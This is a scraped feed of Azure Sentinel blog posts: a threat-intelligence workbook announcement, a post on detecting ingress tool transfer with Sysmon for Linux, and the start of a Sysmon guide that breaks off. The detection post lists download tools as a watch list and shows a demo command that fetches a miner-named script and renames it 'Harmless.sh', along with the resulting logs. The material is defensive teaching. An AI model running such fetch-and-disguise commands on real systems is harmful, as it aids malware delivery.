Azure Sentinel articles https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bg-p/AzureSentinelBlog Azure Sentinel articles Tue, 19 Oct 2021 17:44:37 GMT AzureSentinelBlog 2021-10-19T17:44:37Z What’s New: Azure Sentinel Threat Intelligence Workbook https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-threat-intelligence-workbook/ba-p/2858265 <P>Customers exploring threat intelligence indicators in their cloud workloads today face challenges understanding, aggregating, and actioning data across multiple sources. Threat intelligence is an advanced cybersecurity discipline requiring detailed knowledge of identifying and responding to an attacker based on observation of indicators in various stages of the attack cycle. Azure Sentinel is a cloud native SIEM solution that allows customers to import threat intelligence data from various places such as paid threat feeds, open-source feeds, and threat intelligence sharing communities. Azure Sentinel supports open-source standards to bring in feeds from Threat Intelligence Platforms (TIPs) across STIX &amp; TAXII. Microsoft has released the next evolution of threat hunting capabilities in the Azure Sentinel Threat Intelligence Workbook.&nbsp;</P> <P>&nbsp;</P> <P class="paragraph" style="vertical-align: baseline;"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="TI 18OCT21.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318165iE3D0AFA0BD5DF73C/image-size/large?v=v2&amp;px=999" role="button" title="TI 18OCT21.gif" alt="Azure Sentinel: Threat Intelligence Workbook" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure Sentinel: Threat Intelligence Workbook</span></span></P> <P>Azure Sentinel Threat Intelligence is based in ingestion of threat indicators such as IP addresses, domains, URLs, email senders, and file hashes. This provides a starting point for building threat intelligence programs which require the ability to both ingest and correlate threat data across cloud workloads. This offering provides a free text search to hunt for IPs, hash, emails etc. across 50+ Microsoft telemetry components. There are advanced correlations for AI/ML, UEBA, and geospatial location of threat sources.</P> <P>&nbsp;</P> <P><LI-VIDEO vid="https://www.youtube.com/watch?v=SjEG7iVVBbI" align="center" size="large" width="600" height="338" uploading="false" thumbnail="https://i.ytimg.com/vi/SjEG7iVVBbI/hqdefault.jpg" external="url"></LI-VIDEO></P> <P>&nbsp;</P> <P><FONT size="5" color="#0000FF"><STRONG>Use Cases</STRONG></FONT></P> <P>There are several use cases for the Azure Sentinel Threat Intelligence Workbook depending on user roles and requirements. Common use cases include threat hunting, developing alerting, identifying security weaknesses, conducting assessments with custom reporting, time filtering, subscription filtering, workspace filtering, and guides. The workbook is organized into three sections:</P> <UL> <LI><STRONG>Indicators Ingestion:</STRONG> Evaluate indicators onboarded, threat feeds, and confidence ratings.</LI> <LI><STRONG>Threat Detection &amp; Hunting:</STRONG> Free text search indicators across your cloud workloads.</LI> <LI><STRONG>Observed Threats:</STRONG> Analyze threats by geolocation, threat group, assets targeted and more.</LI> </UL> <P><FONT size="5" color="#0000FF"><STRONG>Benefits</STRONG></FONT></P> <UL> <LI>Ingest, analyze, hunt for indicators within workloads</LI> <LI>Free text search to hunt for IPs, hash, emails etc. across 50+ Microsoft telemetry components</LI> <LI>Advanced correlations for AI/ML, UEBA, and geospatial location of threats</LI> <LI>Find, fix, resolve workload weaknesses</LI> <LI>Query/Alert generation</LI> </UL> <P><FONT size="5"><STRONG><FONT color="#0000FF">Visualization</FONT></STRONG></FONT></P> <UL> <LI>Dozens of visualizations, recommendations, queries</LI> <LI>Single-click report exports</LI> </UL> <P><FONT size="5" color="#0000FF"><STRONG>Audience</STRONG></FONT></P> <UL> <LI><EM>Threat Intelligence Professionals: </EM>Investigations</LI> <LI><EM>SecOps: </EM>Alert/Automation building</LI> <LI><EM>Assessors:</EM> Audit &amp; assessment</LI> <LI><EM>Security Decision Makers: </EM>Situational awareness</LI> <LI><EM>MSSP: </EM>Consultants, Managed Service Providers</LI> </UL> <P><FONT size="5" color="#0000FF"><STRONG>Getting Started</STRONG></FONT></P> <P>This content provides the capability to both ingest and correlate threat data in cloud workloads. The Threat Intelligence workbook provides a free text search to hunt for IPs, hashes, emails etc. across 50+ Microsoft telemetry components. There are advanced correlations for AI/ML, UEBA, and geospatial location of threat sources.</P> <UL> <LI>Onboard <A href="#" target="_blank" rel="noopener">Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Connect Threat Intelligence Platforms</A></LI> <LI><A href="#" target="_blank" rel="noopener">Connect STIX/TAXII Feeds</A></LI> <LI>Access the content <OL> <LI>Azure Sentinel &gt; Threat Intelligence &gt; Threat Intelligence Workbook</LI> </OL> </LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="TJBanasik_1-1634582253857.png" style="width: 731px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318163iD4C0BE6E930819E6/image-dimensions/731x375?v=v2" width="731" height="375" role="button" title="TJBanasik_1-1634582253857.png" alt="TJBanasik_1-1634582253857.png" /></span></P> <P>&nbsp;</P> <UL> <LI>&nbsp;Review the content and provide feedback through our <A href="#" target="_blank" rel="noopener">survey</A></LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="TJBanasik_2-1634582253881.png" style="width: 730px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318164iC8038DCCF1CFDE46/image-dimensions/730x327?v=v2" width="730" height="327" role="button" title="TJBanasik_2-1634582253881.png" alt="TJBanasik_2-1634582253881.png" /></span></P> <P>&nbsp;</P> <P><FONT size="5" color="#0000FF"><STRONG>Frequently Asked Questions</STRONG></FONT></P> <OL> <LI>Why is Threat Intelligence needed? <OL class="lia-list-style-type-lower-alpha"> <LI>Correlate <A href="#" target="_blank" rel="noopener">Cyber Threat Intelligence Indicators (CTI)</A> observed in your workloads</LI> </OL> </LI> <LI>What types of indicators of compromise are included? <OL class="lia-list-style-type-lower-alpha"> <LI><A href="#" target="_blank" rel="noopener">IP Addresses, URLs, Domains, Email Senders, File Hashes</A></LI> </OL> </LI> <LI>Is Multi-Subscription &amp; Multi-Tenant supported? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, via <A href="#" target="_blank" rel="noopener">Workbook Parameters</A> and <A href="#" target="_blank" rel="noopener">Azure Lighthouse</A></LI> </OL> </LI> <LI>Is custom reporting available? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, via guide, time, workspace, &amp; subscription parameters.</LI> </OL> </LI> <LI>Is 3rd Party integration supported? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, via <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model (ASIM)</A> integration.</LI> </OL> </LI> <LI>Is this available in government regions? <OL class="lia-list-style-type-lower-alpha"> <LI>&nbsp;Yes, Azure Sentinel Threat Intelligence is <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227" target="_blank" rel="noopener">Generally Available</A> in Commercial/Government regions</LI> </OL> </LI> <LI>Can this content be exported as a report? <OL class="lia-list-style-type-lower-alpha"> <LI>&nbsp;Yes, via Print Workbooks and Download Artifacts features.</LI> </OL> </LI> <LI>Is STIX/TAXI Integrated? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, the content scales via <A href="#" target="_blank" rel="noopener">Connectors</A> which populate in the <A href="#" target="_blank" rel="noopener">ThreatIntelligenceIndicator</A> data table.</LI> </OL> </LI> <LI>What is Dynamic Display? <OL class="lia-list-style-type-lower-alpha"> <LI>Dozens of queries are executed and only panels with data display</LI> </OL> </LI> <LI>&nbsp;What rights are required to use this content? <OL class="lia-list-style-type-lower-alpha"> <LI><A href="#" target="_blank" rel="noopener">Azure Sentinel Contributor</A> can, create and edit workbooks, analytics rules, and other Azure Sentinel resources. <A href="#" target="_blank" rel="noopener">Azure Sentinel Reader</A> can view data, incidents, workbooks, and other Azure Sentinel resources.</LI> </OL> </LI> </OL> <H3><FONT size="5" color="#0000FF"><STRONG>Learn More About Threat Intelligence with Microsoft Security</STRONG></FONT></H3> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227" target="_blank" rel="noopener">General Availability of Azure Sentinel Threat Intelligence in Public and Azure Government cloud</A></LI> <LI><A href="#" target="_blank" rel="noopener">Understand threat intelligence in Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Microsoft Threat Intelligence | Unparalleled Threat Detection</A></LI> </UL> Tue, 19 Oct 2021 15:00:00 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-threat-intelligence-workbook/ba-p/2858265 TJBanasik 2021-10-19T15:00:00Z MITRE ATT&CK technique coverage with Sysmon for Linux https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/mitre-att-amp-ck-technique-coverage-with-sysmon-for-linux/ba-p/2858219 <P><EM><SPAN>Thanks to Kevin Sheldrake, Roberto Rodriguez, Jessen Kurien and Ofer Shezaf for making this blog possible.</SPAN></EM></P> <P>&nbsp;</P> <P>For many years, people have been using <A href="#" target="_blank" rel="noopener">Sysmon</A> on their Windows systems to gain clarity on what is happening on their machines and, for the security community, to highlight when suspicious or malicious activity occurs. Collecting events from individual hosts is crucial to ensuring you have the visibility needed to identify and respond to malicious events and Sysmon provides a way to do just that. With the introduction of Sysmon for Linux, that same clarity is available for many Linux distros. &nbsp;While we won’t be detailing all the available Sysmon for Linux capabilities in this post, you can find the Sysmon documentation <A href="#" target="_blank" rel="noopener">here</A>, read about how to <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054" target="_blank" rel="noopener">deploy Sysmon</A> in conjunction with Azure Sentinel, look at a quick guide on how you can use <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305" target="_blank" rel="noopener">Sysmon in conjunction with Azure Sentinel</A>, or look through our GitHub repository where we’ve been experimenting with <A href="#" target="_blank" rel="noopener">Sysmon configs for Linux</A>.</P> <P>&nbsp;</P> <P>To frame the conversation around how Sysmon for Linux (shortened to Sysmon from here on out) can be used to create clarity for security teams, we will walk through how Sysmon events can be used to spot a specific MITRE ATT&amp;CK technique. The MITRE ATT&amp;CK Matrix (<A href="#" target="_self">Linux focused version here</A>) is a well-known and respected framework that many organizations use to think about adversary techniques and assess detection coverage. Just like on the Windows side, Sysmon can be used to highlight tactics and techniques across the matrix. In this blog, we will focus in on the Ingress Tool Transfer technique (<A href="#" target="_blank" rel="noopener">ID T1105</A>) and highlight a couple of the Sysmon events that can be used to see it. We observe this technique being used against Linux systems and sensor networks regularly, and while we have tools to alert on this activity, it is still a good idea to ensure you have visibility into the host so you can investigate attacks. To look at this technique, we will show how to enable collection of three useful events, what those events look like when they fire, and how they can help you understand what happened. Additionally, we will show what those events look like in Azure Sentinel.</P> <P>&nbsp;</P> <H2>Ingress Tool Transfer (T1105)</H2> <P>It is common to see attackers taking advantage of initial access to a machine by downloading a script or piece of malware. While “living off the land” is still something to watch for, in attacks on our customers and against our sensor network we see attempts to download tools very frequently.&nbsp; In fact, the MITRE ATT&amp;CK page for <A href="#" target="_blank" rel="noopener">Ingress Tool Transfer</A> shows 290 different pieces of malware and activity groups that use this technique, so it is a good place to start showing how Sysmon can help add coverage to different ATT&amp;CK techniques.</P> <P>&nbsp;</P> <P>For this example, we will focus on the five most commonly used tools for downloading scripts and malware that we’ve seen run on our sensor networks. We will look for wget, curl, ftpget, tftp, and lwp-download. You may want to customize this list for your environment, but this will cover the majority of what we see.</P> <P>&nbsp;</P> <H2>Create your Sysmon configuration file</H2> <P>Just like Sysmon for Windows, you will want to create configuration files based on the system you are wanting to collect logs for based on the role of the system, your environment, and your collection requirements. The basics of how to write and run a configuration can be found on the <A href="#" target="_blank" rel="noopener">Sysmon documentation page</A> and you can see some examples in the <A href="#" target="_blank" rel="noopener">MSTIC-Sysmon repo</A> so we'll just focus on what we need for this specific technique. One thing to note is that the Event IDs are consistent between Windows and Linux so Event ID 1 represents process creation events in both environments.</P> <P>&nbsp;</P> <P>We are interested in seeing when an attacker tries to download files to our computer. There are a few ways we can see that behavior reflected. To begin, we know that a process will have to get created to start the download. We also know that a network connection will have to be made and, if the attacker is successful, a file will be written. Lucky for us, Sysmon has us covered for all three of these with ProcessCreate, NetworkConnect, and FileCreate events.</P> <P>&nbsp;</P> <P>Below is a basic configuration that we can use to create those events based on our list of the commonly used tools (<A href="#" target="_self">it is available in our repo here</A>). You can see we have separate sections for each of the events we want and have said we want to include the listed matches.&nbsp; The tool name will be in the “Image” field, and we’ve used “end with” because we generally expect to see file paths there (ex. /bin/wget).</P> <P>&nbsp;</P> <LI-CODE lang="markup">&lt;!-- Created: 10/15/2021 Modified: 10/17/2021 Technique: Ingress Tool Transfer References: - https://attack.mitre.org/techniques/T1105/ --&gt; &lt;Sysmon schemaversion="4.81"&gt; &lt;EventFiltering&gt; &lt;RuleGroup name="" groupRelation="or"&gt; &lt;ProcessCreate onmatch="include"&gt; &lt;Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"&gt; &lt;Image condition="end with"&gt;wget&lt;/Image&gt; &lt;Image condition="end with"&gt;curl&lt;/Image&gt; &lt;Image condition="end with"&gt;ftpget&lt;/Image&gt; &lt;Image condition="end with"&gt;tftp&lt;/Image&gt; &lt;Image condition="end with"&gt;lwp-download&lt;/Image&gt; &lt;/Rule&gt; &lt;/ProcessCreate&gt; &lt;/RuleGroup&gt; &lt;RuleGroup name="" groupRelation="or"&gt; &lt;NetworkConnect onmatch="include"&gt; &lt;Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"&gt; &lt;Image condition="end with"&gt;wget&lt;/Image&gt; &lt;Image condition="end with"&gt;curl&lt;/Image&gt; &lt;Image condition="end with"&gt;ftpget&lt;/Image&gt; &lt;Image condition="end with"&gt;tftp&lt;/Image&gt; &lt;Image condition="end with"&gt;lwp-download&lt;/Image&gt; &lt;/Rule&gt; &lt;/NetworkConnect&gt; &lt;/RuleGroup&gt; &lt;RuleGroup name="" groupRelation="or"&gt; &lt;FileCreate onmatch="include"&gt; &lt;Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"&gt; &lt;Image condition="end with"&gt;wget&lt;/Image&gt; &lt;Image condition="end with"&gt;curl&lt;/Image&gt; &lt;Image condition="end with"&gt;ftpget&lt;/Image&gt; &lt;Image condition="end with"&gt;tftp&lt;/Image&gt; &lt;Image condition="end with"&gt;lwp-download&lt;/Image&gt; &lt;/Rule&gt; &lt;/FileCreate&gt; &lt;/RuleGroup&gt; &lt;/EventFiltering&gt; &lt;/Sysmon&gt;</LI-CODE> <P>&nbsp;</P> <P>One thing to note is that both ProcessCreate and ProcessTerminate are enabled by default.&nbsp; If you don't want to collect one of those, you'll need an empty "include" statement. Once you have your configuration created and enabled, you’ll start seeing events.</P> <P>&nbsp;</P> <H2>Raw Sysmon events</H2> <P>The Sysmon logs can be found in <EM>/var/log/syslog</EM>. While you could just look at the raw events there, we have the SysmonLogView tool which can make it easier. This tool will take the Sysmon events and display them in the more human readable format that you can see below. You can use the below command to push new events from syslog into the sysmonLogView using the following command:</P> <P>&nbsp;</P> <P><EM>sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView</EM></P> <P>&nbsp;</P> <P>This gives us a running view of what events are being created. We can then run the below command to trigger the rules.</P> <P><BR /><EM>wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh</EM></P> <P><BR />This command will use wget to call out to a server at 10.0.5.8 port 7000, download the xmrigAttackDemo.sh script, and save it as the script Harmless.sh. xmrigAttackDemo.sh is an internal testing script that I used for this demo.</P> <P>&nbsp;</P> <H3>ProcessCreate (Event ID 1):</H3> <P>You can see we get quite a lot of information from the ProcessCreate event. We can see wget in the Image field, the full Command Line, the Current Directory, and the user. You also get Parent Process information although it isn’t as interesting in this example.</P> <P>&nbsp;</P> <LI-CODE lang="bash">Event SYSMONEVENT_CREATE_PROCESS RuleName: - UtcTime: 2021-09-28 21:53:22.533 ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image: /usr/bin/wget FileVersion: - Description: - Product: - Company: - OriginalFileName: - CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh CurrentDirectory: /home/testUser User: testUser LogonGuid: {23b1b3a6-0000-0000-e903-000000000000} LogonId: 1001 TerminalSessionId: 38 IntegrityLevel: no level Hashes: - ParentProcessGuid: {23b1b3a6-8ed2-6153-0824-7cafd1550000} ParentProcessId: 13408 ParentImage: /bin/bash ParentCommandLine: bash</LI-CODE> <P>&nbsp;</P> <H3>NetworkConnect (Event ID 3):</H3> <P>In the NetworkConnect event, we again see wget in the Image field and the user. We also see the protocol, source and destination IP addresses, and the ports involved. Our example command line has the IP listed already so it isn’t new information, but it could be useful in tying the different logs together. You’ll notice the Process IDs also match up as expected.</P> <P>&nbsp;</P> <LI-CODE lang="bash">Event SYSMONEVENT_NETWORK_CONNECT RuleName: - UtcTime: 2021-09-28 21:53:22.543 ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image: /usr/bin/wget User: testUser Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 10.0.5.10 SourceHostname: - SourcePort: 40680 SourcePortName: - DestinationIsIpv6: false DestinationIp: 10.0.5.8 DestinationHostname: - DestinationPort: 7000 DestinationPortName: - </LI-CODE> <P>&nbsp;</P> <H3>FileCreate (Event ID 11):</H3> <P>Here we can again see the wget tool and the process Id. We also have the name of the file that was created and its file path.</P> <P>&nbsp;</P> <LI-CODE lang="bash">Event SYSMONEVENT_FILE_CREATE RuleName: - UtcTime: 2021-09-28 21:53:22.536 ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image: /usr/bin/wget TargetFilename: /home/testUser/Harmless.sh CreationUtcTime: 2021-09-28 21:53:22.536</LI-CODE> <P>&nbsp;</P> <H2>Viewing in Azure Sentinel</H2> <P>Sysmon events are pushed to Syslog so if you are collecting Syslog events from your Linux machine into Azure Sentinel, you will get the Sysmon events.&nbsp; For more details on how to make that connection, check out the documentation <A href="#" target="_blank" rel="noopener">here</A>.&nbsp; Also, as the Sysmon events come through with most of the data in the Syslog Message field, you’ll need to parse out the fields you are interested in.&nbsp; Fortunately, the <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model</A> parsers have you covered. You can install the Parsers from the link <A href="#" target="_blank" rel="noopener">here</A>. Once you do, you’ll have access to functions that have taken the guesswork out of parsing.</P> <P>&nbsp;</P> <P>The parsing functions are available under Functions-&gt; Workspace functions. In the below, you can see the Linux Sysmon functions we currently have.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_7-1634581968271.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318156i02CB0D262F777D42/image-size/medium?v=v2&amp;px=400" role="button" title="russmc_7-1634581968271.png" alt="russmc_7-1634581968271.png" /></span></P> <P>&nbsp;</P> <P>Using the function vimProcessCreateLinuxSysmon, we can see our event reflected. We have narrowed the query to just the event in the example above and chosen to project only a couple of the columns of data.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_0-1634586546027.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318176iE2954311E1950B3A/image-size/large?v=v2&amp;px=999" role="button" title="russmc_0-1634586546027.png" alt="russmc_0-1634586546027.png" /></span></P> <P>From here you can start to include Sysmon as a data source for your hunting queries and analytics.</P> <P>&nbsp;</P> <H2>Sysmon for Linux and MITRE ATT&amp;CK</H2> <P>While we didn’t dig into all the possible Sysmon events or ATT&amp;CK techniques, hopefully you can see how you can use Sysmon to collect data that will highlight adversary techniques. Sysmon</P> <P>is open source and available in the <A href="#" target="_blank" rel="noopener">Sysinternals GitHub</A>. &nbsp;If you have requests or find bugs, check out the <A href="#" target="_blank" rel="noopener">Sysmon for Linux project page</A> for the best ways to contact the team. MSTIC has been working with different configs and have started a <A href="#" target="_blank" rel="noopener">repo here</A> to share with the community. If you want to see other configs based on MITRE ATT&amp;CK techniques, check them out <A href="#" target="_blank" rel="noopener">here</A> and feel free to add suggestions of your own. If you want a config that has all the techniques we've mapped so far, you can find it <A href="#" target="_self">here</A>. We will continue to come up with new ways to utilize the logs in Azure Sentinel and we look forward to seeing what the community develops. If the amazing work around the Windows version is any indication, we expect that the future of Linux logging is bright.</P> <P>&nbsp;</P> <H2>References:</H2> <UL> <LI>Automating your install of Sysmon for Linux with Azure Sentinel: <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054" target="_blank" rel="noopener">Automating the deployment of Sysmon for Linux :penguin:</img> and Azure Sentinel in a lab environment 🧪 - Microsoft Tech Community</A></LI> <LI>Quick guide to using Sysmon for Linux: <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305" target="_blank" rel="noopener">A Quick Guide on Using Sysmon for Linux in Azure Sentinel - Microsoft Tech Community</A></LI> <LI>Sysmon Documentation: <A href="#" target="_blank" rel="noopener">Sysmon - Windows Sysinternals | Microsoft Docs</A></LI> <LI>MITRE ATT&amp;CK Linux Matrix: <A href="#" target="_blank" rel="noopener">Matrix - Enterprise | MITRE ATT&amp;CK®</A></LI> <LI>Connect Syslog to Azure Sentinel: <A href="#" target="_blank" rel="noopener">Connect Syslog data to Azure Sentinel | Microsoft Docs</A></LI> <LI>Install Azure Sentinel Information Mode parsers: <A href="#" target="_blank" rel="noopener">Azure-Sentinel/Parsers/ASim at master · Azure/Azure-Sentinel · GitHub</A><SPAN>&nbsp; </SPAN></LI> <LI>Sysinternals GitHub: <A href="#" target="_blank" rel="noopener">Windows Sysinternals · GitHub</A></LI> <LI>Sysmon for Linux: <A href="#" target="_blank" rel="noopener">GitHub - Sysinternals/SysmonForLinux</A></LI> <LI>Sysmon for Linux Install: <A href="#" target="_blank" rel="noopener">SysmonForLinux/INSTALL.md at main · Sysinternals/SysmonForLinux · GitHub</A></LI> <LI>MSTIC-Sysmon GitHub repo: <A href="#" target="_blank" rel="noopener">GitHub - Azure/MSTIC-Sysmon: Sharing anything Sysmon (Windows and Linux) with the InfoSec community</A></LI> </UL> Mon, 18 Oct 2021 21:10:03 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/mitre-att-amp-ck-technique-coverage-with-sysmon-for-linux/ba-p/2858219 russmc 2021-10-18T21:10:03Z A Quick Guide on Using Sysmon for Linux in Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305 <P style="margin: 0in; background: white;"><EM><SPAN style="font-size: 10.5pt; font-family: 'Lato',sans-serif; color: #333333;">Jessen Kurien - Microsoft Threat Intelligence Center</SPAN></EM></P> <P style="box-sizing: border-box; font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; word-spacing: 0px;"><EM style="box-sizing: border-box;"><SPAN style="font-size: 10.5pt; font-family: 'Lato',sans-serif; color: #333333;">Thanks to Kevin Sheldrake, Russell McDonald, Roberto Rodriguez and Ofer Shezaf for making this blog possible.</SPAN></EM></P> <P style="box-sizing: border-box; font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; word-spacing: 0px;">&nbsp;</P> <P><SPAN data-contrast="auto">Today,&nbsp;Linux is&nbsp;one of the fastest growing platforms on Azure. Linux based images&nbsp;form&nbsp;over 60% of Azure Marketplace Images. With Azure's support of common Linux distributions growing&nbsp;every day,&nbsp;the sophistication of&nbsp;cyber-attacks&nbsp;targeting Linux&nbsp;continues to grow.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;As part of the&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/windows-events/sysinternals-25-a-special-anniversary-event/ev-p/2787286" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysinternals 25</SPAN><SPAN data-contrast="none">th</SPAN><SPAN data-contrast="none">&nbsp;anniversary</SPAN></A><SPAN data-contrast="auto">,&nbsp;the&nbsp;Sysinternals&nbsp;team&nbsp;released a new&nbsp;Sysmon&nbsp;tool&nbsp;supporting&nbsp;Linux.&nbsp;Sysmon for&nbsp;Linux is&nbsp;an open-source&nbsp;Linux system monitoring tool that helps with providing details on process creations, network connections,&nbsp;file creations&nbsp;and deletions among other things.&nbsp;Sysmon for Linux is&nbsp;based on an&nbsp;eBPF (Extended Berkeley Packet Filter)-based technology&nbsp;targeted at in-kernel monitoring without&nbsp;making&nbsp;any changes to the kernel source code.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; By collecting the events it generates using Azure Sentinel&nbsp;and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sysmon for Linux can be used to&nbsp;analyze&nbsp;pre compromise&nbsp;and&nbsp;post compromise&nbsp;activity&nbsp;and when&nbsp;correlated&nbsp;with Azure Security&nbsp;Center (ASC)/Azure Defender&nbsp;(AzD)&nbsp;Linux detections&nbsp;this&nbsp;helps&nbsp;detecting the end-to-end attacker activity.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;In this blog post we will be taking a quick look at different log events made available by&nbsp; Sysmon for Linux that defenders can use to gather more information on the alerts triggered in Azure Sentinel.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN><SPAN data-contrast="auto">In&nbsp;Azure&nbsp;Sentinel, alerts can be viewed under Threat Management&nbsp;&gt;&nbsp;Incidents:&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_0-1634234806558.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317452i382F0782F6C0FA56/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_0-1634234806558.png" alt="jessenkurien_0-1634234806558.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">A summarized graphical threat view is also available under the Security Operations Efficiency tab:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_1-1634234806549.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317453iC1F4C1450D8E109B/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_1-1634234806549.png" alt="jessenkurien_1-1634234806549.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN><SPAN 